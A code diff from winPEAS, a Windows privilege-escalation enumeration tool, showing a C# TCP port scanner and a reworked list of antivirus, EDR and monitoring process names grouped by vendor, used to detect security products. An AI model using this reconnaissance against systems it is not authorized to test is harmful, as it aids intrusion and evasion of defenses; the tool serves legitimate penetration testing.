548,554,555,563,587,593,616,617,625,631,636,646,648,666,667,668,683,687,691,700,705,711,714,720,722,726,749,765,777,783,787,800,801,808,843,873,880,888,898,900,901,
902,903,911,912,981,987,990,992,993,995,999,1000,1001,1002,1007,1009,1010,1011,1021,1022,1023,1024,1025,1026,1027,1028,1029,1030,1031,1032,1033,1034,1035,1036,1037,
1038,1039,1040,1041,1042,1043,1044,1045,1046,1047,1048,1049,1050,1051,1052,1053,1054,1055,1056,1057,1058,1059,1060,1061,1062,1063,1064,1065,1066,1067,1068,1069,1070,
1071,1072,1073,1074,1075,1076,1077,1078,1079,1080,1081,1082,1083,1084,1085,1086,1087,1088,1089,1090,1091,1092,1093,1094,1095,1096,1097,1098,1099,1100,1102,1104,1105,
1106,1107,1108,1110,1111,1112,1113,1114,1117,1119,1121,1122,1123,1124,1126,1130,1131,1132,1137,1138,1141,1145,1147,1148,1149,1151,1152,1154,1163,1164,1165,1166,1169,
1174,1175,1183,1185,1186,1187,1192,1198,1199,1201,1213,1216,1217,1218,1233,1234,1236,1244,1247,1248,1259,1271,1272,1277,1287,1296,1300,1301,1309,1310,1311,1322,1328,
1334,1352,1417,1433,1434,1443,1455,1461,1494,1500,1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687,1688,1700,1717,1718,1719,1720,1721,1723,1755,
1761,1782,1783,1801,1805,1812,1839,1840,1862,1863,1864,1875,1900,1914,1935,1947,1971,1972,1974,1984,1998,1999,2000,2001,2002,2003,2004,2005,2006,2007,2008,2009,2010,
2013,2020,2021,2022,2030,2033,2034,2035,2038,2040,2041,2042,2043,2045,2046,2047,2048,2049,2065,2068,2099,2100,2103,2105,2106,2107,2111,2119,2121,2126,2135,2144,2160,
2161,2170,2179,2190,2191,2196,2200,2222,2251,2260,2288,2301,2323,2366,2381,2382,2383,2393,2394,2399,2401,2492,2500,2522,2525,2557,2601,2602,2604,2605,2607,2608,2638,
2701,2702,2710,2717,2718,2725,2800,2809,2811,2869,2875,2909,2910,2920,2967,2968,2998,3000,3001,3003,3005,3006,3007,3011,3013,3017,3030,3031,3052,3071,3077,3128,3168,
3211,3221,3260,3261,3268,3269,3283,3300,3301,3306,3322,3323,3324,3325,3333,3351,3367,3369,3370,3371,3372,3389,3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689,
3690,3703,3737,3766,3784,3800,3801,3809,3814,3826,3827,3828,3851,3869,3871,3878,3880,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000,4001,4002,4003,4004,4005,
4006,4045,4111,4125,4126,4129,4224,4242,4279,4321,4343,4443,4444,4445,4446,4449,4550,4567,4662,4848,4899,4900,4998,5000,5001,5002,5003,5004,5009,5030,5033,5050,5051,
5054,5060,5061,5080,5087,5100,5101,5102,5120,5190,5200,5214,5221,5222,5225,5226,5269,5280,5298,5357,5405,5414,5431,5432,5440,5500,5510,5544,5550,5555,5560,5566,5631,
5633,5666,5678,5679,5718,5730,5800,5801,5802,5810,5811,5815,5822,5825,5850,5859,5862,5877,5900,5901,5902,5903,5904,5906,5907,5910,5911,5915,5922,5925,5950,5952,5959,
5960,5961,5962,5963,5987,5988,5989,5998,5999,6000,6001,6002,6003,6004,6005,6006,6007,6009,6025,6059,6100,6101,6106,6112,6123,6129,6156,6346,6389,6502,6510,6543,6547,
6565,6566,6567,6580,6646,6666,6667,6668,6669,6689,6692,6699,6779,6788,6789,6792,6839,6881,6901,6969,7000,7001,7002,7004,7007,7019,7025,7070,7100,7103,7106,7200,7201,
7402,7435,7443,7496,7512,7625,7627,7676,7741,7777,7778,7800,7911,7920,7921,7937,7938,7999,8000,8001,8002,8007,8008,8009,8010,8011,8021,8022,8031,8042,8045,8080,8081,
8082,8083,8084,8085,8086,8087,8088,8089,8090,8093,8099,8100,8180,8181,8192,8193,8194,8200,8222,8254,8290,8291,8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651,
8652,8654,8701,8800,8873,8888,8899,8994,9000,9001,9002,9003,9009,9010,9011,9040,9050,9071,9080,9081,9090,9091,9099,9100,9101,9102,9103,9110,9111,9200,9207,9220,9290,
9415,9418,9485,9500,9502,9503,9535,9575,9593,9594,9595,9618,9666,9876,9877,9878,9898,9900,9917,9929,9943,9944,9968,9998,9999,10000,10001,10002,10003,10004,10009,10010,
10012,10024,10025,10082,10180,10215,10243,10566,10616,10617,10621,10626,10628,10629,10778,11110,11111,11967,12000,12174,12265,12345,13456,13722,13782,13783,14000,14238,
14441,14442,15000,15002,15003,15004,15660,15742,16000,16001,16012,16016,16018,16080,16113,16992,16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,
19842,20000,20005,20031,20221,20222,20828,21571,22939,23502,24444,24800,25734,25735,26214,27000,27352,27353,27355,27356,27715,28201,30000,30718,30951,31038,31337,32768,
32769,32770,32771,32772,32773,32774,32775,32776,32777,32778,32779,32780,32781,32782,32783,32784,32785,33354,33899,34571,34572,34573,35500,38292,40193,40911,41511,42510,
44176,44442,44443,44501,45100,48080,49152,49153,49154,49155,49156,49157,49158,49159,49160,49161,49163,49165,49167,49175,49176,49400,49999,50000,50001,50002,50003,50006,
50300,50389,50500,50636,50800,51103,51493,52673,52822,52848,52869,54045,54328,55055,55056,55555,55600,56737,56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,
64623,64680,65000,65129,65389
};
#endregion
private struct TcpPortState
{
public TcpClient MainClient { get; set; }
public bool IsTcpPortOpen { get; set; }
}
IEnumerable<int> portsToScan = nmapTop1000TCPPorts;
public PortScanner(IEnumerable<int> ports)
{
if (ports != null)
{
portsToScan = ports;
}
}
public void Start(string host)
{
Parallel.ForEach(portsToScan, port =>
{
RunScanTcp(host, port);
});
}
public void RunScanTcp(string host, int port)
{
Thread.Sleep(1);
var newClient = new TcpClient();
var state = new TcpPortState
{
MainClient = newClient,
IsTcpPortOpen = true
};
IAsyncResult ar = newClient.BeginConnect(host, port, AsyncCallback, state);
state.IsTcpPortOpen = ar.AsyncWaitHandle.WaitOne(TcpTimeout, false);
if (state.IsTcpPortOpen == false || newClient.Connected == false)
{
return;
}
Console.WriteLine("[+] Open TCP port at: {0}:{1}", host, port);
}
void AsyncCallback(IAsyncResult asyncResult)
{
var state = (TcpPortState)asyncResult.AsyncState;
TcpClient client = state.MainClient;
try
{
client.EndConnect(asyncResult);
}
catch
{
return;
}
if (client.Connected && state.IsTcpPortOpen)
{
return;
}
client.Close();
}
}
}

751
winPEAS/winPEASexe/winPEAS/Info/ProcessInfo/DefensiveProcesses.cs
View File

@ -4,664 +4,103 @@ namespace winPEAS.Info.ProcessInfo
{
static class DefensiveProcesses
{
public static Dictionary<string, string> Definitions = new Dictionary<string, string>()
private static Dictionary<string, HashSet<string>> Definitions = new Dictionary<string, HashSet<string>>()
{
{"mcshield.exe" , "McAfee AV"},
{"windefend.exe" , "Windows Defender AV"},
{"MSASCui.exe" , "Windows Defender AV"},
{"MSASCuiL.exe" , "Windows Defender AV"},
{"msmpeng.exe" , "Windows Defender AV"},
{"msmpsvc.exe" , "Windows Defender AV"},
{"WRSA.exe" , "WebRoot AV"},
{"savservice.exe" , "Sophos AV"},
{"TMCCSF.exe" , "Trend Micro AV"},
{"symantec antivirus.exe" , "Symantec AV"},
{"mbae.exe" , "MalwareBytes Anti-Exploit"},
{"parity.exe" , "Bit9 application whitelisting"},
{"cb.exe" , "Carbon Black behavioral analysis"},
{"bds-vision.exe" , "BDS Vision behavioral analysis"},
{"Triumfant.exe" , "Triumfant behavioral analysis"},
{"CSFalcon.exe" , "CrowdStrike Falcon EDR"},
{"ossec.exe" , "OSSEC intrusion detection"},
{"TmPfw.exe" , "Trend Micro firewall"},
{"dgagent.exe" , "Verdasys Digital Guardian DLP"},
{"kvoop.exe" , " DLP process" },
{"AAWTray.exe" , ""},
{"ackwin32.exe" , ""},
{"Ad-Aware.exe" , ""},
{"adaware.exe" , ""},
{"advxdwin.exe" , ""},
{"agentsvr.exe" , ""},
{"agentw.exe" , ""},
{"alertsvc.exe" , ""},
{"alevir.exe" , ""},
{"alogserv.exe" , ""},
{"amon9x.exe" , ""},
{"anti-trojan.exe" , ""},
{"antivirus.exe" , ""},
{"ants.exe" , ""},
{"apimonitor.exe" , ""},
{"aplica32.exe" , ""},
{"apvxdwin.exe" , ""},
{"arr.exe" , ""},
{"atcon.exe" , ""},
{"atguard.exe" , ""},
{"atro55en.exe" , ""},
{"atupdater.exe" , ""},
{"atwatch.exe" , ""},
{"au.exe" , ""},
{"aupdate.exe" , ""},
{"auto-protect.nav80try.exe", ""},
{"autodown.exe" , ""},
{"autoruns.exe" , ""},
{"autorunsc.exe" , ""},
{"autotrace.exe" , ""},
{"autoupdate.exe" , ""},
{"avconsol.exe" , ""},
{"ave32.exe" , ""},
{"avgcc32.exe" , ""},
{"avgctrl.exe" , ""},
{"avgemc.exe" , ""},
{"avgnt.exe" , ""},
{"avgrsx.exe" , ""},
{"avgserv.exe" , ""},
{"avgserv9.exe" , ""},
{"avguard.exe" , ""},
{"avgwdsvc.exe" , ""},
{"avgui.exe" , ""},
{"avgw.exe" , ""},
{"avkpop.exe" , ""},
{"avkserv.exe" , ""},
{"avkservice.exe" , ""},
{"avkwctl9.exe" , ""},
{"avltmain.exe" , ""},
{"avnt.exe" , ""},
{"avp.exe" , ""},
{"avp32.exe" , ""},
{"avpcc.exe" , ""},
{"avpdos32.exe" , ""},
{"avpm.exe" , ""},
{"avptc32.exe" , ""},
{"avpupd.exe" , ""},
{"avsched32.exe" , ""},
{"avsynmgr.exe" , ""},
{"avwin.exe" , ""},
{"avwin95.exe" , ""},
{"avwinnt.exe" , ""},
{"avwupd.exe" , ""},
{"avwupd32.exe" , ""},
{"avwupsrv.exe" , ""},
{"avxmonitor9x.exe" , ""},
{"avxmonitornt.exe" , ""},
{"avxquar.exe" , ""},
{"backweb.exe" , ""},
{"bargains.exe" , ""},
{"bd_professional.exe" , ""},
{"beagle.exe" , ""},
{"belt.exe" , ""},
{"bidef.exe" , ""},
{"bidserver.exe" , ""},
{"bipcp.exe" , ""},
{"bipcpevalsetup.exe" , ""},
{"bisp.exe" , ""},
{"blackd.exe" , ""},
{"blackice.exe" , ""},
{"blink.exe" , ""},
{"blss.exe" , ""},
{"bootconf.exe" , ""},
{"bootwarn.exe" , ""},
{"borg2.exe" , ""},
{"bpc.exe" , ""},
{"brasil.exe" , ""},
{"bs120.exe" , ""},
{"bundle.exe" , ""},
{"bvt.exe" , ""},
{"ccapp.exe" , ""},
{"ccevtmgr.exe" , ""},
{"ccpxysvc.exe" , ""},
{"ccSvcHst.exe" , ""},
{"cdp.exe" , ""},
{"cfd.exe" , ""},
{"cfgwiz.exe" , ""},
{"cfiadmin.exe" , ""},
{"cfiaudit.exe" , ""},
{"cfinet.exe" , ""},
{"cfinet32.exe" , ""},
{"claw95.exe" , ""},
{"claw95cf.exe" , ""},
{"clean.exe" , ""},
{"cleaner.exe" , ""},
{"cleaner3.exe" , ""},
{"cleanpc.exe" , ""},
{"cleanup.exe" , ""},
{"click.exe" , ""},
{"cmdagent.exe" , ""},
{"cmesys.exe" , ""},
{"cmgrdian.exe" , ""},
{"cmon016.exe" , ""},
{"connectionmonitor.exe" , ""},
{"cpd.exe" , ""},
{"cpf9x206.exe" , ""},
{"cpfnt206.exe" , ""},
{"ctrl.exe" , ""},
{"cv.exe" , ""},
{"cwnb181.exe" , ""},
{"cwntdwmo.exe" , ""},
{"CylanceUI.exe" , ""},
{"CyProtect.exe" , ""},
{"CyUpdate.exe" , ""},
{"cyserver.exe" , ""},
{"cytray.exe" , ""},
{"CyveraService.exe" , ""},
{"datemanager.exe" , ""},
{"dcomx.exe" , ""},
{"defalert.exe" , ""},
{"defscangui.exe" , ""},
{"defwatch.exe" , ""},
{"deputy.exe" , ""},
{"divx.exe" , ""},
{"dgprompt.exe" , ""},
{"DgService.exe" , ""},
{"dllcache.exe" , ""},
{"dllreg.exe" , ""},
{"doors.exe" , ""},
{"dpf.exe" , ""},
{"dpfsetup.exe" , ""},
{"dpps2.exe" , ""},
{"drwatson.exe" , ""},
{"drweb32.exe" , ""},
{"drwebupw.exe" , ""},
{"dssagent.exe" , ""},
{"dumpcap.exe" , ""},
{"dvp95.exe" , ""},
{"dvp95_0.exe" , ""},
{"ecengine.exe" , ""},
{"efpeadm.exe" , ""},
{"egui.exe" , ""},
{"ekrn.exe" , ""},
{"emet_agent.exe" , ""},
{"emet_service.exe" , ""},
{"emsw.exe" , ""},
{"engineserver.exe" , ""},
{"ent.exe" , ""},
{"esafe.exe" , ""},
{"escanhnt.exe" , ""},
{"escanv95.exe" , ""},
{"espwatch.exe" , ""},
{"ethereal.exe" , ""},
{"etrustcipe.exe" , ""},
{"evpn.exe" , ""},
{"exantivirus-cnet.exe" , ""},
{"exe.avxw.exe" , ""},
{"expert.exe" , ""},
{"explore.exe" , ""},
{"f-agnt95.exe" , ""},
{"f-prot.exe" , ""},
{"f-prot95.exe" , ""},
{"f-stopw.exe" , ""},
{"fameh32.exe" , ""},
{"fast.exe" , ""},
{"fch32.exe" , ""},
{"fcagswd.exe" , "McAfee DLP Agent"},
{"fcags.exe" , "McAfee DLP Agent"},
{"fih32.exe" , ""},
{"findviru.exe" , ""},
{"firesvc.exe" , "McAfee Host Intrusion Prevention"},
{"firetray.exe" , ""},
{"firewall.exe" , ""},
{"fnrb32.exe" , ""},
{"fp-win.exe" , ""},
{"fp-win_trial.exe" , ""},
{"fprot.exe" , ""},
{"frameworkservice.exe" , ""},
{"frminst.exe" , ""},
{"frw.exe" , ""},
{"fsaa.exe" , ""},
{"fsav.exe" , ""},
{"fsav32.exe" , ""},
{"fsav530stbyb.exe" , ""},
{"fsav530wtbyb.exe" , ""},
{"fsav95.exe" , ""},
{"fsgk32.exe" , ""},
{"fsm32.exe" , ""},
{"fsma32.exe" , ""},
{"fsmb32.exe" , ""},
{"gator.exe" , ""},
{"gbmenu.exe" , ""},
{"gbpoll.exe" , ""},
{"generics.exe" , ""},
{"gmt.exe" , ""},
{"guard.exe" , ""},
{"guarddog.exe" , ""},
{"hacktracersetup.exe" , ""},
{"hbinst.exe" , ""},
{"hbsrv.exe" , ""},
{"HijackThis.exe" , ""},
{"hipsvc.exe" , ""},
{"HipMgmt.exe" , "McAfee Host Intrusion Protection"},
{"hotactio.exe" , ""},
{"hotpatch.exe" , ""},
{"htlog.exe" , ""},
{"htpatch.exe" , ""},
{"hwpe.exe" , ""},
{"hxdl.exe" , ""},
{"hxiul.exe" , ""},
{"iamapp.exe" , ""},
{"iamserv.exe" , ""},
{"iamstats.exe" , ""},
{"ibmasn.exe" , ""},
{"ibmavsp.exe" , ""},
{"icload95.exe" , ""},
{"icloadnt.exe" , ""},
{"icmon.exe" , ""},
{"icsupp95.exe" , ""},
{"icsuppnt.exe" , ""},
{"idle.exe" , ""},
{"iedll.exe" , ""},
{"iedriver.exe" , ""},
{"iface.exe" , ""},
{"ifw2000.exe" , ""},
{"inetlnfo.exe" , ""},
{"infus.exe" , ""},
{"infwin.exe" , ""},
{"init.exe" , ""},
{"intdel.exe" , ""},
{"intren.exe" , ""},
{"iomon98.exe" , ""},
{"istsvc.exe" , ""},
{"jammer.exe" , ""},
{"jdbgmrg.exe" , ""},
{"jedi.exe" , ""},
{"kavlite40eng.exe" , ""},
{"kavpers40eng.exe" , ""},
{"kavpf.exe" , ""},
{"kazza.exe" , ""},
{"keenvalue.exe" , ""},
{"kerio-pf-213-en-win.exe" , ""},
{"kerio-wrl-421-en-win.exe" , ""},
{"kerio-wrp-421-en-win.exe" , ""},
{"kernel32.exe" , ""},
{"KeyPass.exe" , ""},
{"killprocesssetup161.exe" , ""},
{"launcher.exe" , ""},
{"ldnetmon.exe" , ""},
{"ldpro.exe" , ""},
{"ldpromenu.exe" , ""},
{"ldscan.exe" , ""},
{"lnetinfo.exe" , ""},
{"loader.exe" , ""},
{"localnet.exe" , ""},
{"lockdown.exe" , ""},
{"lockdown2000.exe" , ""},
{"lookout.exe" , ""},
{"lordpe.exe" , ""},
{"lsetup.exe" , ""},
{"luall.exe" , ""},
{"luau.exe" , ""},
{"lucomserver.exe" , ""},
{"luinit.exe" , ""},
{"luspt.exe" , ""},
{"mapisvc32.exe" , ""},
{"masvc.exe" , "McAfee Agent"},
{"mbamservice.exe" , ""},
{"mcafeefire.exe" , ""},
{"mcagent.exe" , ""},
{"mcmnhdlr.exe" , ""},
{"mcscript.exe" , ""},
{"mcscript_inuse.exe" , ""},
{"mctool.exe" , ""},
{"mctray.exe" , ""},
{"mcupdate.exe" , ""},
{"mcvsrte.exe" , ""},
{"mcvsshld.exe" , ""},
{"md.exe" , ""},
{"mfeann.exe" , "McAfee VirusScan Enterprise"},
{"mfemactl.exe" , "McAfee VirusScan Enterprise"},
{"mfevtps.exe" , ""},
{"mfin32.exe" , ""},
{"mfw2en.exe" , ""},
{"mfweng3.02d30.exe" , ""},
{"mgavrtcl.exe" , ""},
{"mgavrte.exe" , ""},
{"mghtml.exe" , ""},
{"mgui.exe" , ""},
{"minilog.exe" , ""},
{"minionhost.exe" , ""},
{"mmod.exe" , ""},
{"monitor.exe" , ""},
{"moolive.exe" , ""},
{"mostat.exe" , ""},
{"mpfagent.exe" , ""},
{"mpfservice.exe" , ""},
{"mpftray.exe" , ""},
{"mrflux.exe" , ""},
{"msapp.exe" , ""},
{"msbb.exe" , ""},
{"msblast.exe" , ""},
{"mscache.exe" , ""},
{"msccn32.exe" , ""},
{"mscman.exe" , ""},
{"msconfig.exe" , ""},
{"msdm.exe" , ""},
{"msdos.exe" , ""},
{"msiexec16.exe" , ""},
{"msinfo32.exe" , ""},
{"mslaugh.exe" , ""},
{"msmgt.exe" , ""},
{"msmsgri32.exe" , ""},
{"MsSense.exe" , "Microsoft Defender ATP"},
{"mssmmc32.exe" , ""},
{"mssys.exe" , ""},
{"msvxd.exe" , ""},
{"mu0311ad.exe" , ""},
{"mwatch.exe" , ""},
{"n32scanw.exe" , ""},
{"naprdmgr.exe" , ""},
{"nav.exe" , ""},
{"navap.navapsvc.exe" , ""},
{"navapsvc.exe" , ""},
{"navapw32.exe" , ""},
{"navdx.exe" , ""},
{"navlu32.exe" , ""},
{"navnt.exe" , ""},
{"navstub.exe" , ""},
{"navw32.exe" , ""},
{"navwnt.exe" , ""},
{"nc2000.exe" , ""},
{"ncinst4.exe" , ""},
{"ndd32.exe" , ""},
{"neomonitor.exe" , ""},
{"neowatchlog.exe" , ""},
{"netarmor.exe" , ""},
{"netd32.exe" , ""},
{"netinfo.exe" , ""},
{"netmon.exe" , ""},
{"netscanpro.exe" , ""},
{"netspyhunter-1.2.exe" , ""},
{"netstat.exe" , ""},
{"netutils.exe" , ""},
{"nisserv.exe" , ""},
{"nisum.exe" , ""},
{"nmain.exe" , ""},
{"nod32.exe" , ""},
{"normist.exe" , ""},
{"norton_internet_secu_3.0_407.exe" , ""},
{"notstart.exe" , ""},
{"npf40_tw_98_nt_me_2k.exe" , ""},
{"npfmessenger.exe" , ""},
{"nprotect.exe" , ""},
{"npscheck.exe" , ""},
{"npssvc.exe" , ""},
{"nsched32.exe" , ""},
{"nssys32.exe" , ""},
{"nstask32.exe" , ""},
{"nsupdate.exe" , ""},
{"nt.exe" , ""},
{"ntrtscan.exe" , ""},
{"ntvdm.exe" , ""},
{"ntxconfig.exe" , ""},
{"nui.exe" , ""},
{"nupgrade.exe" , ""},
{"nvarch16.exe" , ""},
{"nvc95.exe" , ""},
{"nvsvc32.exe" , ""},
{"nwinst4.exe" , ""},
{"nwservice.exe" , ""},
{"nwtool16.exe" , ""},
{"nxlog.exe" , ""},
{"ollydbg.exe" , ""},
{"onsrvr.exe" , ""},
{"optimize.exe" , ""},
{"ostronet.exe" , ""},
{"osqueryd.exe" , ""},
{"otfix.exe" , ""},
{"outpost.exe" , ""},
{"outpostinstall.exe" , ""},
{"outpostproinstall.exe" , ""},
{"padmin.exe" , ""},
{"panixk.exe" , ""},
{"patch.exe" , ""},
{"pavcl.exe" , ""},
{"pavproxy.exe" , ""},
{"pavsched.exe" , ""},
{"pavw.exe" , ""},
{"pccwin98.exe" , ""},
{"pcfwallicon.exe" , ""},
{"pcip10117_0.exe" , ""},
{"pcscan.exe" , ""},
{"pdsetup.exe" , ""},
{"periscope.exe" , ""},
{"persfw.exe" , ""},
{"perswf.exe" , ""},
{"pf2.exe" , ""},
{"pfwadmin.exe" , ""},
{"pgmonitr.exe" , ""},
{"pingscan.exe" , ""},
{"platin.exe" , ""},
{"pop3trap.exe" , ""},
{"poproxy.exe" , ""},
{"popscan.exe" , ""},
{"portdetective.exe" , ""},
{"portmonitor.exe" , ""},
{"powerscan.exe" , ""},
{"ppinupdt.exe" , ""},
{"pptbc.exe" , ""},
{"ppvstop.exe" , ""},
{"prizesurfer.exe" , ""},
{"prmt.exe" , ""},
{"prmvr.exe" , ""},
{"procdump.exe" , ""},
{"processmonitor.exe" , ""},
{"procexp.exe" , ""},
{"procexp64.exe" , ""},
{"procexplorerv1.0.exe" , ""},
{"procmon.exe" , ""},
{"programauditor.exe" , ""},
{"proport.exe" , ""},
{"protectx.exe" , ""},
{"pspf.exe" , ""},
{"purge.exe" , ""},
{"qconsole.exe" , ""},
{"qserver.exe" , ""},
{"rapapp.exe" , ""},
{"rav7.exe" , ""},
{"rav7win.exe" , ""},
{"rav8win32eng.exe" , ""},
{"ray.exe" , ""},
{"rb32.exe" , ""},
{"rcsync.exe" , ""},
{"realmon.exe" , ""},
{"reged.exe" , ""},
{"regedit.exe" , ""},
{"regedt32.exe" , ""},
{"rescue.exe" , ""},
{"rescue32.exe" , ""},
{"rrguard.exe" , ""},
{"rtvscan.exe" , ""},
{"rtvscn95.exe" , ""},
{"rulaunch.exe" , ""},
{"run32dll.exe" , ""},
{"rundll.exe" , ""},
{"rundll16.exe" , ""},
{"ruxdll32.exe" , ""},
{"safeweb.exe" , ""},
{"sahagent.exescan32.exe" , ""},
{"save.exe" , ""},
{"savenow.exe" , ""},
{"sbserv.exe" , ""},
{"scam32.exe" , ""},
{"scan32.exe" , ""},
{"scan95.exe" , ""},
{"scanpm.exe" , ""},
{"scrscan.exe" , ""},
{"SentinelOne.exe" , ""},
{"serv95.exe" , ""},
{"setupvameeval.exe" , ""},
{"setup_flowprotector_us.exe", ""},
{"sfc.exe" , ""},
{"sgssfw32.exe" , ""},
{"sh.exe" , ""},
{"shellspyinstall.exe" , ""},
{"shn.exe" , ""},
{"showbehind.exe" , ""},
{"shstat.exe" , "McAfee VirusScan Enterprise"},
{"SISIDSService.exe" , ""},
{"SISIPSUtil.exe" , ""},
{"smc.exe" , ""},
{"sms.exe" , ""},
{"smss32.exe" , ""},
{"soap.exe" , ""},
{"sofi.exe" , ""},
{"sperm.exe" , ""},
{"splunk.exe" , "Splunk"},
{"splunkd.exe" , "Splunk"},
{"splunk-admon.exe" , "Splunk"},
{"splunk-powershell.exe" , "Splunk"},
{"splunk-winevtlog.exe" , "Splunk"},
{"spf.exe" , ""},
{"sphinx.exe" , ""},
{"spoler.exe" , ""},
{"spoolcv.exe" , ""},
{"spoolsv32.exe" , ""},
{"spyxx.exe" , ""},
{"srexe.exe" , ""},
{"srng.exe" , ""},
{"ss3edit.exe" , ""},
{"ssgrate.exe" , ""},
{"ssg_4104.exe" , ""},
{"st2.exe" , ""},
{"start.exe" , ""},
{"stcloader.exe" , ""},
{"supftrl.exe" , ""},
{"support.exe" , ""},
{"supporter5.exe" , ""},
{"svchostc.exe" , ""},
{"svchosts.exe" , ""},
{"sweep95.exe" , ""},
{"sweepnet.sweepsrv.sys.swnetsup.exe", ""},
{"symproxysvc.exe" , ""},
{"symtray.exe" , ""},
{"sysedit.exe" , ""},
{"sysmon.exe" , "Sysinternals Sysmon"},
{"sysupd.exe" , ""},
{"TaniumClient.exe" , "Tanium"},
{"taskmg.exe" , ""},
{"taskmo.exe" , ""},
{"taumon.exe" , ""},
{"tbmon.exe" , ""},
{"tbscan.exe" , ""},
{"tc.exe" , ""},
{"tca.exe" , ""},
{"tcm.exe" , ""},
{"tcpview.exe" , ""},
{"tds-3.exe" , ""},
{"tds2-98.exe" , ""},
{"tds2-nt.exe" , ""},
{"teekids.exe" , ""},
{"tfak.exe" , ""},
{"tfak5.exe" , ""},
{"tgbob.exe" , ""},
{"titanin.exe" , ""},
{"titaninxp.exe" , ""},
{"tlaservice.exe" , ""},
{"tlaworker.exe" , ""},
{"tracert.exe" , ""},
{"trickler.exe" , ""},
{"trjscan.exe" , ""},
{"trjsetup.exe" , ""},
{"trojantrap3.exe" , ""},
{"tsadbot.exe" , ""},
{"tshark.exe" , ""},
{"tvmd.exe" , ""},
{"tvtmd.exe" , ""},
{"udaterui.exe" , ""},
{"undoboot.exe" , ""},
{"updat.exe" , ""},
{"update.exe" , ""},
{"updaterui.exe" , ""},
{"upgrad.exe" , ""},
{"utpost.exe" , ""},
{"vbcmserv.exe" , ""},
{"vbcons.exe" , ""},
{"vbust.exe" , ""},
{"vbwin9x.exe" , ""},
{"vbwinntw.exe" , ""},
{"vcsetup.exe" , ""},
{"vet32.exe" , ""},
{"vet95.exe" , ""},
{"vettray.exe" , ""},
{"vfsetup.exe" , ""},
{"vir-help.exe" , ""},
{"virusmdpersonalfirewall.exe", ""},
{"vnlan300.exe" , ""},
{"vnpc3000.exe" , ""},
{"vpc32.exe" , ""},
{"vpc42.exe" , ""},
{"vpfw30s.exe" , ""},
{"vptray.exe" , ""},
{"vscan40.exe" , ""},
{"vscenu6.02d30.exe" , ""},
{"vsched.exe" , ""},
{"vsecomr.exe" , ""},
{"vshwin32.exe" , ""},
{"vsisetup.exe" , ""},
{"vsmain.exe" , ""},
{"vsmon.exe" , ""},
{"vsstat.exe" , ""},
{"vstskmgr.exe" , "McAfee VirusScan Enterprise"},
{"vswin9xe.exe" , ""},
{"vswinntse.exe" , ""},
{"vswinperse.exe" , ""},
{"w32dsm89.exe" , ""},
{"w9x.exe" , ""},
{"watchdog.exe" , ""},
{"webdav.exe" , ""},
{"webscanx.exe" , ""},
{"webtrap.exe" , ""},
{"wfindv32.exe" , ""},
{"whoswatchingme.exe" , ""},
{"wimmun32.exe" , ""},
{"win-bugsfix.exe" , ""},
{"win32.exe" , ""},
{"win32us.exe" , ""},
{"winactive.exe" , ""},
{"window.exe" , ""},
{"windows.exe" , ""},
{"wininetd.exe" , ""},
{"wininitx.exe" , ""},
{"winlogin.exe" , ""},
{"winmain.exe" , ""},
{"winnet.exe" , ""},
{"winppr32.exe" , ""},
{"winrecon.exe" , ""},
{"winservn.exe" , ""},
{"winssk32.exe" , ""},
{"winstart.exe" , ""},
{"winstart001.exe" , ""},
{"wintsk32.exe" , ""},
{"winupdate.exe" , ""},
{"wireshark.exe" , ""},
{"wkufind.exe" , ""},
{"wnad.exe" , ""},
{"wnt.exe" , ""},
{"wradmin.exe" , ""},
{"wrctrl.exe" , ""},
{"wsbgate.exe" , ""},
{"wupdater.exe" , ""},
{"wupdt.exe" , ""},
{"wyvernworksfirewall.exe" , ""},
{"xagt.exe" , ""},
{"xpf202en.exe" , ""},
{"zapro.exe" , ""},
{"zapsetup3001.exe" , ""},
{"zatutor.exe" , ""},
/*{"zonalm2601" , ""}, These names (ending in .exe) are detected by AVs
{"zonealarm" , ""},
{"_avp32" , ""},
{"_avpcc" , ""},
{"rshell" , ""},
{"_avpms" , ""}*/
{ "ALYac", new HashSet<string>() { "alyac.exe", "aylaunch.exe", "asmsetup.exe", } },
{ "AVG Antivirus", new HashSet<string>() { "avgui.exe", } },
{ "AVG", new HashSet<string>() { "avgemc.exe", "afwserv.exe", "avgsvc.exe", "aswidsagent.exe", } },
{ "Ad-Aware Total Security by Lavasoft", new HashSet<string>() { "ffcachetool.exe", "avktray.exe", "gdsc.exe", "bootcdwizard.exe", "avkservice.exe", "ask.exe", "avkwctlx64.exe", "gdfwadmin.exe", "avktuner.exe", "initinst.exe", "gdfwsvc.exe", "avk.exe", "avkwscpe.exe", "avkwctl.exe", "avktunerservice.exe", "mkisofs.exe", "gdfirewalltray.exe", "initinstx64.exe", "gdgadgetinst32.exe", "gdfwsvcx64.exe", "aawtray.exe", } },
{ "AhnLab-V3", new HashSet<string>() { "aup80if.ex", "v3ui.exe", "v3medic.exe", "v3lite.exe", "v3l4cli.exe", } },
{ "Antiy-AVL", new HashSet<string>() { "avl.exe", } },
{ "Arcabit", new HashSet<string>() { "arcavir.exe", "arcaconfsv.exe", "arcabit.core.loggingservice.exe", "arcabit.core.configurator2.exe", "arcabit.exe", } },
{ "Avast Antivirus", new HashSet<string>() { "avastui.exe", } },
{ "Avast", new HashSet<string>() { "avast-antivirus.exe", "avastsvc.exe", "ashserv.exe", } },
{ "Avira", new HashSet<string>() { "avira.webapphost.exe", } },
{ "Baidu", new HashSet<string>() { "bav.exe", "bavcloud.exe", "bavhm.exe", "bavsvc.exe", "bavtray.exe", "bavupdater.exe", "bavbsreport.exe", } },
{ "BitDefender", new HashSet<string>() { "epprotectedservice.exe", "epsecurityservice.exe", "epupdateservice.exe", "epupdateserver.exe", "bdagent.exe", } },
{ "Bkav Pro", new HashSet<string>() { "bkavutil.exe", "bkav.exe", "bkavpro.exe", "bkavservice.exe", } },
{ "CMC", new HashSet<string>() { "cmcpanel.exe", "cmccore.exe", "cmctrayicon.exe", } },
{ "Cisco", new HashSet<string>() { "sfc.exe", } },
{ "ClamAV", new HashSet<string>() { "clamscan.exe", "freshclam.exe", } },
{ "Comodo", new HashSet<string>() { "cavwp.exe", "cfp.exe", } },
{ "CrowdStrike Falcon", new HashSet<string>() { "falconsensorwinos.exe", } },
{ "Cybereason", new HashSet<string>() { "cybereasonransomfreeservicehost.exe", } },
{ "Cylance", new HashSet<string>() { "cylancesvc.exe", } },
